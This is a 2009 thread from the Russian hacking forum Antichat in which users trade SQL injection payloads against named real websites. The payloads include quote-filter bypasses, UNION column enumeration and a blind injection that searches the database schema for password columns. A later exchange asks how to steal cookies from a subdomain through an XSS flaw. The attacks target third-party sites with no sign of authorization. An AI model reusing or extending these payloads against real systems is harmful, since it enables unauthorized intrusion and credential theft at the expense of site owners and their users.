ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
01.06.2009, 00:15
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
nemaniak а ты попробуй какимнить http дебагером! типа Accessdiver
я глянул полей с выводом нема ((
Последний раз редактировалось Rubaka; 01.06.2009 в 00:31..
|
|
|
01.06.2009, 00:23
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
а после редиректа нет полей с выводом? часто бывает что они присутствуют. Ежели нету, но хочется норм.скули - поищи ее в другом месте.
|
|
|
|
01.06.2009, 00:26
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.clavesin.ru/articles/index_tplid4_recid3'.html
without redirect
|
|
|
|
01.06.2009, 19:36
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
http://www.clavesin.ru/articles/index_tplid4_recid3+or+1=1.html
выдает ошибку, подскажите плиз почему? И как эту инъекцию раскрутить бы?
|
|
|
|
01.06.2009, 21:36
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766
Репутация:
317
|
|
http://www.clavesin.ru/articles/index_tplid4_recid3+or+1=1.html
выдает ошибку, подскажите плиз почему? И как эту инъекцию раскрутить бы?
Там для выполнения запроса, должна присутствовать одинарная ковычка в запросе, а она "фильтруется"
http://www.clavesin.ru/articles/index_tplid4_recid3/*'*/.html
|
|
|
|
02.06.2009, 10:25
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Код:
http://www.thechimneypot.com/newsletter.php?id=11+order+by+5--
http://www.thechimneypot.com/newsletter.php?id=-1+union+select+1,2,3,4,5
Union'ом подобрал до 50 - без результатов. |
|
|
|
02.06.2009, 11:20
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.thechimneypot.com/newsletter.php?id=11+and+1=if(ascii(substring((sel ect+table_name+from+information_schema.columns+whe re+column_name+like+0x257061737325+limit+0,1),1,1) )>1,1,2)--+
Либо рядом
http://www.thechimneypot.com/gallery.php?category_id=17&hall_of_fame=&project_i d=-336+union+select+1,2,3,4,table_name,6+from+informa tion_schema.columns+where+column_name+like+0x25706 1737325--+
|
|
|
|
02.06.2009, 17:32
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Есть сайт site.ru на этом сайте есть XSS-уязвимость. Есть субдомен - forum.site.ru, с него необходимо стырить куки. Можно?
|
|
|
|
02.06.2009, 17:34
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Походу,тут решает переменная path в session_id,если не ошибаюсь() ).Если path=/,то куки доступны всему домену)
|
|
|
|
02.06.2009, 17:40
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
Провел на форуме:
418218
Репутация:
59
|
|
2mailbrush
Возможность есть только если в куках прописано чтото типа domain:.site.ru
А так никак, так как поддомен это уже совершенно ДРУГОЙ сайт и куки там устанавливаются ДРУГИЕ
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид